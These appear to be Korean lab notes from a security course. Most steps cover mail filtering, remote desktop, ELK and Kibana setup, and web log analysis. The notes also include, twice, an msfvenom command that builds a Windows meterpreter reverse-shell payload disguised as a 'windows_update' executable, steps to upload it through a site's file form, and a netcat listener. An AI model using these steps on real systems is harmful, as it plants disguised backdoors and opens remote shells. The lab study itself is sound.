18일차

미션1
해커로 부터 오는 이메일 정상화 시키기
nano /etc/mail/access
makemap hash /etc/mail/access < /etc/mail/access
systemctl restart sendmail

칼리에서 공격root로
msfvenom --platform windows -p windows/meterpreter/reverse_tcp
LHOST=100.100.100.1
LPORT=4444
-b "Wx00"
-f exe
-o /home/kali/windows_update_20240114001.exe

미션2
윈도우 원격연결 활성화 시키기
제어판->시스템 및 보안->시스템->원격설정->
방화벽 NAT추가

미션3
lms.st.kr 이라는 사이트가 정상적으로 운영되도록 설정할것

editplus에
enctype없으면 업로드가 안됌

칼리에서 공격root로
msfvenom --platform windows -p windows/meterpreter/reverse_tcp
LHOST=100.100.100.1
LPORT=4444
-b "Wx00"
-f exe
-o /home/kali/windows_update_20250114001.exe

칼리에서 lms에 windows파일 업로드
포트여는법 nc -l -p 4444 ->확인 netstat -ant | grep 4444


[01-14selk버전 2204로]
nano /etc/elasticsearch/elasticsearch.yml
network 0.0.0.0 으로 허용
systemctl start elasticsearch 오류뜨면 nano /etc/다시들어가서 directory 주석제거
curl -X GET "localhost:9200"
systemctl enable elasticsearch
netstat -ant | grep 5601

nano /etc/nginx/sites-available/default

systemctl restart nginx
systemctl start kibana
systemctl enable kibana

reboot

dvwa.st.kr 공격하면
ping > hping3 > nikto > Brute Force
access.log
10.0.2.3 kibana 분석



cd /var/log/apache2->ls->cp access.log /backup->cd /backup->ls->\\10.0.2.15에 access.log 바탕화면에빼오고 www폴더안에넣기
->10.0.2.3웹사이트에 home에 upload a file에 들어가서 access.log 열고 import후
->www_access_log->import

로그보기
메인 서버에서 cd /home/dvwa/public_html/logs


[3대 서버 설치]
curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install filebeat
sudo apt -y install packetbeat

systemctl start logstash
nano logdd
output

nano /etc/logstash/conf.d/elasticsearch-output.conf
output {
if [@metadata][pipeline] {
elasticsearch {
hosts => ["localhost:9200"]
manage_template => false
index => "%{[@metadata][beat]}-%{[@metadata]}-%[]"